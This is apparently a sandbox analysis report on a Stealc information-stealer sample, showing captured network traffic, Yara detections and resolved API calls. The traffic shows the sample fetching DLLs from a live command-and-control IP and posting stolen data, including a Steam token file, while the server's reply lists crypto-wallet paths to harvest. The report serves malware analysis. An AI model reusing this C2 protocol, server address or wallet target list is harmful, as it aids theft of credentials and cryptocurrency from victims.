Oct 2, 2024 23:10:12.411804914 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:12 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 2, 2024 23:10:12.715786934 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 2, 2024 23:10:12.941447973 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:12 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Oct 2, 2024 23:10:14.928267002 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 2, 2024 23:10:15.166312933 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:15 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 2, 2024 23:10:15.561630964 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 2, 2024 23:10:15.778594971 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:15 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 2, 2024 23:10:16.014530897 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJ Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 23:10:17.374944925 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:16 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 23:10:17.376151085 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:16 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 23:10:17.429456949 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFCAFIIDHIDGHIECGDGI Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 43 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 43 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 43 47 44 47 49 2d 2d 0d 0a Data Ascii: ------KFCAFIIDHIDGHIECGDGIContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------KFCAFIIDHIDGHIECGDGIContent-Disposition: form-data; name="message"wallets------KFCAFIIDHIDGHIECGDGI--
Oct 2, 2024 23:10:17.666349888 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:17 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 2, 2024 23:10:17.756865978 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCA Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="message"files------DGHJEHJJDAAAKEBGCFCA--
Oct 2, 2024 23:10:17.981472015 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:17 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 23:10:17.992552042 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCBKFHJJJKKFHIDAAKF Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AFCBKFHJJJKKFHIDAAKFContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------AFCBKFHJJJKKFHIDAAKFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AFCBKFHJJJKKFHIDAAKFContent-Disposition: form-data; name="file"------AFCBKFHJJJKKFHIDAAKF--
Oct 2, 2024 23:10:19.723861933 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 23:10:19.725155115 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 23:10:19.725830078 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 23:10:19.750911951 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCA Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="message"ybncbhylepme------DGHJEHJJDAAAKEBGCFCA--
Oct 2, 2024 23:10:19.973534107 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:19 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 23:10:19.975426912 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 2d 2d 0d 0a Data Ascii: ------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------KKFCFBKFCFBFIDGCGDHJ--
Oct 2, 2024 23:10:20.697164059 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:20 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	17:09:58
Start date:	02/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x890000
File size:	1'805'312 bytes
MD5 hash:	48D1DA4A5ABCC06E5B66ECEB3358798B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2274503696.000000000154E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2047168594.0000000005240000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 008A9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,01560840), ref: 008A98A1
GetProcAddress.KERNEL32(75900000,015605E8), ref: 008A98BA
GetProcAddress.KERNEL32(75900000,015607F8), ref: 008A98D2
GetProcAddress.KERNEL32(75900000,01560600), ref: 008A98EA
GetProcAddress.KERNEL32(75900000,01560798), ref: 008A9903
GetProcAddress.KERNEL32(75900000,015688D0), ref: 008A991B
GetProcAddress.KERNEL32(75900000,015566C0), ref: 008A9933
GetProcAddress.KERNEL32(75900000,01556860), ref: 008A994C
GetProcAddress.KERNEL32(75900000,01560570), ref: 008A9964
GetProcAddress.KERNEL32(75900000,015606F0), ref: 008A997C
GetProcAddress.KERNEL32(75900000,015606A8), ref: 008A9995
GetProcAddress.KERNEL32(75900000,01560678), ref: 008A99AD
GetProcAddress.KERNEL32(75900000,01556940), ref: 008A99C5
GetProcAddress.KERNEL32(75900000,01560708), ref: 008A99DE
GetProcAddress.KERNEL32(75900000,01560720), ref: 008A99F6
GetProcAddress.KERNEL32(75900000,01556780), ref: 008A9A0E
GetProcAddress.KERNEL32(75900000,01560738), ref: 008A9A27
GetProcAddress.KERNEL32(75900000,01560768), ref: 008A9A3F
GetProcAddress.KERNEL32(75900000,015567C0), ref: 008A9A57
GetProcAddress.KERNEL32(75900000,01560780), ref: 008A9A70
GetProcAddress.KERNEL32(75900000,01556A20), ref: 008A9A88
LoadLibraryA.KERNEL32(015605B8,?,008A6A00), ref: 008A9A9A
LoadLibraryA.KERNEL32(015607B0,?,008A6A00), ref: 008A9AAB
LoadLibraryA.KERNEL32(01560828,?,008A6A00), ref: 008A9ABD
LoadLibraryA.KERNEL32(015605D0,?,008A6A00), ref: 008A9ACF
LoadLibraryA.KERNEL32(015607C8,?,008A6A00), ref: 008A9AE0
GetProcAddress.KERNEL32(75070000,015607E0), ref: 008A9B02
GetProcAddress.KERNEL32(75FD0000,01560810), ref: 008A9B23
GetProcAddress.KERNEL32(75FD0000,01568DC0), ref: 008A9B3B
GetProcAddress.KERNEL32(75A50000,01568BF8), ref: 008A9B5D
GetProcAddress.KERNEL32(74E50000,01556880), ref: 008A9B7E
GetProcAddress.KERNEL32(76E80000,01568950), ref: 008A9B9F
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 008A9BB6

Strings

NtQueryInformationProcess, xrefs: 008A9BAA

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
